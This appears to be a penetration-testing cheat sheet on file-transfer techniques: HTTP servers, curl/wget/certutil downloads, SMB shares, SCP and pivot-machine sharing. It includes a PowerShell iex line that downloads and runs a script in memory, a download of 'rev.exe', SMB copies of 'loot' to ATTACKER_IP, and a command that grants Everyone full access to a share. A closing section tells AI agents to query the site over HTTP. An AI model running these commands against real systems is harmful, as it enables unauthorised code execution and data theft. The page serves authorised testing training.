# Files Transfer Tools

#### Python Simple HTTP Server <a href="#id-4946" id="id-4946"></a>

```bash
# Start the server in linux
python3 -m http.server 8080
```

```bash
# LINUX: Use curl
curl -O http://<ip-address>/<file>
# LINUX: Use wget
wget http://<ip-address>/<file>
# LINUX: Use nc
nc -nv <IP> 8080 > test.txt

# -----------------------

# Windows: Use certutil
certutil -urlcache -split -f http://<ip-address>/<file> <downloaded-filename>
# Windows: Using iwr in Powershell
iwr -uri http://<ip-address>/<file> -o <downloaded-filename>
# Windows: Use powershell System Webclient
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.10.10.100/rev.exe', 'rev.exe')
# Windows: Use powershell webrequest (Clone from internet example)
powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
# Windows: Use powershell iex to executed in memory
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://10.10.10.100:8000/ps-sudo.ps1')
```

#### SMB Server

```bash
# Create a share named share1
impacket-smbserver share1 . -smb2support
```

```bash
# Open file explorer and drop the file there
\\<LINUX_IP>\share1

# Download Files FROM Attacker using Windows CMD
copy C:\Users\user\Desktop\file.txt \\<Attacker_IP>\share1\

# Upload files to attacker using Windows CMD
copy <upload-file> \<kali-ip>\share1\<file>

# Download files by mapping network drive
net use \\Attacker_IP\share1
cd \\Attacker_IP\share1\
.\winPEASany.exe
```

```powershell
# Download files from attacker using Powershell
Copy-Item \\ATTACKER_IP\share\tool.exe C:\Temp\tool.exe

# Upload files to attacker using Windows Powershell
Copy-Item C:\Users\victim\Desktop\loot.txt \\ATTACKER_IP\share\
```

### SCP

```bash
# Transfer files from local to remote
# Use -r if you need recurisve directory copying
scp local/file.txt john@10.10.10.100:/tmp/file.txt
scp -i priv.key local/file.txt john@10.10.10.100:/tmp/file.txt
scp /home/ubuntu/myfile john@10.10.10.10:/C:/Users/sam/Desktop

# Transfer files from remote to local
# Use -r if you need recurisve directory copying
scp john@10.10.10.100:/tmp/file.txt local_file.txt
scp -i priv.key john@10.10.10.100:/tmp/file.txt local_file.txt
scp C:\Users\sam\Desktop\myfile.txt john@10.10.10.100:/home/ubuntu/
```

### Share Files Via Pivot Machine

1. RDP to the pivot machine and open the file explorer and open the folder's properties which you want to share.
2. Go to `Sharing` -> `Advanced Sharing` -> Tick "`Share this Folder`" -> `Permissions` -> Tick "`Full Contro`l"
3. Go to `Security` -> `Edit` -> `Add` -> Make the Location as the current machine using "`Locations`" -> enter "`Everyone`" -> `Check Names` -> Ok (Ensure Read and execute perms are present atleast)
4. On the command prompt in the pivot machine, share the folder using:

   ```bash
   net share public=c:\Users\Public /GRANT:Everyone,FULL
   ```
5. Now going to the internal machine's file explorer and typing `\\PIVOT_IP` -> Enter shows us access to the files present in the pivot machine.

### References

1. <https://medium.com/@robertip/oscp-notes-useful-file-transfer-techniques-12efc3a8ff02>
2. <https://juggernaut-sec.com/windows-file-transfers-for-hackers/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gokulkarthik.gitbook.io/pentesting-checklist/others/miscellaneous/files-transfer-tools.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.